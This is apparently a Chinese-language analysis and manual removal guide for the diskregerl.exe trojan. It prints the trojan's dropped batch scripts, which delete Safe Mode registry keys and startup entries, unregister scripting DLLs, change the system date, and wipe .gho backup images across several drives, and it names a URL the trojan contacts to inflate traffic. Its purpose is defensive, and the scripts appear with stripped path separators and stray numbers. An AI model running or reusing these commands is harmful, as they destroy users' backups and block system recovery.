文件MD5:e98a4571cf72b798077d12d6c4894629
行为分析:
1、拷贝文件:
C:windowssystem32diskregerl.exe45,056字节
2、无添加启动项举动。
3、释放2个批处理:
内容分别为:
22483
17213
25187
6133
22690
25373
date2004-08-17
19477
time20:00:00
ping127.0.0.1-n5
sc.execreatediskregerlBinPath="C:windowssystem32diskregerl.exe-kills"type=owntype=interactstart=autoDisplayName=diskregerlProgramnot
sc.exedescriptiondiskregerl创建网络连接2
regsvr32.exe/u/sscrrun.dll
regsvr32.exe/u/sshimgvw.dll
regsvr32.exe/u/sitss.dll
regsvr32.exe/u/svbscript.dll
regsvr32.exe/sjscript.dll
reg.exedeleteHKLMSYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLMSYSTEMControlSet001ControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLMSYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLMSYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLMSoftwareMicrosoftWindowsCurrentVersionRun/F
23413
sc.exestartdiskregerl
del"C:WINDOWSMediaWindowsXP开始.wav"
del"C:WINDOWSMediaWindowsXP信息栏.wav"
del"C:WINDOWSMediaWindowsXP弹出窗口已阻止.wav"
regsvr32.exe/sC:windowssystem32Programnot.dll
ping127.0.0.1-n6
del"C:DocumentsandSettings孤独更可靠桌面oky.exe"/F
22483
17213
date2008-04-02
time08:21:33
del%0
exit
第二个:
25187
6133
226902537319477
2819720092
404
ping127.0.0.1-n16
13539
cmd.exe/cdel/f/s/qc:*.gho
6752
cmd.exe/cdel/f/s/qd:*.gho
31772
cmd.exe/cdel/f/s/qe:*.gho
12028
cmd.exe/cdel/f/s/qf:*.gho
8720
cmd.exe/cdel/f/s/qg:*.gho
10731
cmd.exe/cdel/f/s/qh:*.gho
8840
cmd.exe/cdel/f/s/qi:*.gho
11736
regsvr32.exe/sC:windowssystem32Programnot.dll
del%0
exit
4、连接网站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外该病毒可能恶意锁定IE主页,不过未实现。
解决方法:
1、重启计算机。
2、删除文件:
C:windowssystem32diskregerl.exe
3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45it.com下载),结束其进程。
【diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀】相关文章:
★ winfoams.dll,auto.exe,450381EC.EXE病毒的手动清除方法
★ 遭遇www.investpoll.net病毒附手动删除方法
★ RAV0088.exe RAV0088.DAT手工查杀方法
★ setup.exe microsoft.exe SP00LV.exe手动查杀